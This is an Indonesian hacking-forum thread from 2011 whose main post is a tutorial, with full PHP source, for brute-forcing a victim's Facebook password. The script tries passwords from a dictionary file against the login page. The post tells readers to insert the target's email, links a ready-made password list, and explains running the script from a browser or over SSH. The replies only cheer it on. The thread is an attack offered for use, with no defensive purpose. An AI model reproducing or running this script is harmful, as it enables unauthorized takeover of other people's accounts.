Kalimantan-Cyber
Welcome -=- Kalimantan Cyber -=-

Forum yang berisi para member komunitas underground di Indonesia,, visi misi membangun forum ini adalah untuk, mengumpulkan pada hacker-hacker indonesia yang selama ini sudah cukup banyak di tanah air kita ini. diharapkan kepada semua komunitas underground untuk dapat bergabung disini dan saling share agar kita tidak mudah terpengaruh oleh para hacker-hacker dari negara lain yang ingin menyusupi kegiatan kita di indonesia.
Kalimantan-Cyber
Welcome -=- Kalimantan Cyber -=-

Forum yang berisi para member komunitas underground di Indonesia,, visi misi membangun forum ini adalah untuk, mengumpulkan pada hacker-hacker indonesia yang selama ini sudah cukup banyak di tanah air kita ini. diharapkan kepada semua komunitas underground untuk dapat bergabung disini dan saling share agar kita tidak mudah terpengaruh oleh para hacker-hacker dari negara lain yang ingin menyusupi kegiatan kita di indonesia.
Kalimantan-Cyber
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
IndeksportalPencarianLatest imagesPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Keywords
Top posters
hambran
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
Arief andhika_RzR
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
Xcode_RzR
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
Frozhx
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
venomus_RzR
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
Rieco
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
langsam
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
kiwil
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
Down
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 
RzR_Faizal_RzR
tutorial brute force & script code I_vote_lcaptutorial brute force & script code I_voting_bartutorial brute force & script code I_vote_rcap 

 

 tutorial brute force & script code

Go down 
3 posters
PengirimMessage
Arief andhika_RzR
Admin
Arief andhika_RzR


Jumlah posting : 35
Reputation : 1
Join date : 26.08.11
Age : 36
Lokasi : cibubur,bekasi,jawa barat

tutorial brute force & script code Empty
PostSubyek: tutorial brute force & script code   tutorial brute force & script code Icon_minitimeSun Aug 28, 2011 7:46 pm

Facebook Brute force attack!
Bahan2 yg di butuhkan:

Upload 3 file berikut di web hosting kamu (usahakan yg berbayar, coz klo yg gratisan suka ga support) Cry

1.fb.php yang isinya skrip brute force
2.dictionary.txt
3.cookie.txt

ingat musti satu folder

edit bagian ini $username ="brute@force.com";

ganti dgn email korban

jalankan/eksekusi /fb.php .

Oke, ini skrip brute force-nya

Code:
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.com"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found : 
$line
";}
}
?>


File dictionary.txt nya bisa kamu bikin sendiri, atau ngambil dari yg udh ada. Kalo malas bikin,
ambil di sini
Code:
http://facebook.irfan1933.com/dictionary.txt
. Tinggal buang bagian md5-nya.

File cookies.txt kosongkan saja.

Oke, ada 2 cara meng-eksekusi file fb.php/skrip brute force.

1.) Menggunakan web browser. Cara ini mudah, tapi relatif lbh lama. Karna kita tau, kalau modus grafis selalu lebih lamban di banding modus text. Cara nya tinggal upload semua file2 di atas ke web hosting, lalu jalankan melalui browser. Gampang kan? tampi lambreta abisss!. Web browser favorit saya adalah Opera.

2.)Menggunakan SSH client. Cara ini lbh cepat, tapi relatif lbh sulit. Selain itu kita jg harus punya web hosting sendiri, coz web hosting gratisan biasa-nya tidak akan memberi hak SSH pada kita Tolong. Cara-nya kita harus meng-eksekusi skrip via SSH client/console yg sudah terkoneksi ke server kita. SSH client favorit saya adalah Putty.

Ingat, tidak semua FB bisa di crack dng cara ini... semua tergantung database dari Dictionary.txt jg dari tinggkat kerumitan Password. So... inti-nya cuma satu... SABAR... Lips Sealed Lips Sealed Lips Sealed

oiy lupa ane juga pnya video tutorial nya neh wad agan-agan smua...



SELAMAT MENCOBA YA.... Very Happy Very Happy Very Happy


Terakhir diubah oleh Arief andhika_RzR tanggal Sun Aug 28, 2011 8:12 pm, total 1 kali diubah
Kembali Ke Atas Go down
Xcode_RzR
Admin
Xcode_RzR


Jumlah posting : 20
Reputation : 0
Join date : 27.08.11

tutorial brute force & script code Empty
PostSubyek: Re: tutorial brute force & script code   tutorial brute force & script code Icon_minitimeSun Aug 28, 2011 8:05 pm

KEEP POSTING AJA
Kembali Ke Atas Go down
Arief andhika_RzR
Admin
Arief andhika_RzR


Jumlah posting : 35
Reputation : 1
Join date : 26.08.11
Age : 36
Lokasi : cibubur,bekasi,jawa barat

tutorial brute force & script code Empty
PostSubyek: Re: tutorial brute force & script code   tutorial brute force & script code Icon_minitimeSun Aug 28, 2011 8:17 pm

okay gan.....
klw masih ada yg kurang kasih tau ane ya...
biar smua bisa lebih ngerti mksd postingan ini n bisa paham sama isi postingan ini gan....
Kembali Ke Atas Go down
hambran
Admin
hambran


Jumlah posting : 61
Reputation : 1
Join date : 26.08.11

tutorial brute force & script code Empty
PostSubyek: Re: tutorial brute force & script code   tutorial brute force & script code Icon_minitimeSun Aug 28, 2011 10:10 pm

:study: selamat membaca
Kembali Ke Atas Go down
https://kalimantan-cyber.indonesianforum.net
Sponsored content





tutorial brute force & script code Empty
PostSubyek: Re: tutorial brute force & script code   tutorial brute force & script code Icon_minitime

Kembali Ke Atas Go down
 
tutorial brute force & script code
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Script HTML
» script bulan
» tutorial hack dengan teknik jumping server
» kumpulan script jahil
» script widget I LOVE YOU INDONESIA

Permissions in this forum:Anda tidak dapat menjawab topik
Kalimantan-Cyber :: Cyber Underground Activity :: Hacking-
Navigasi: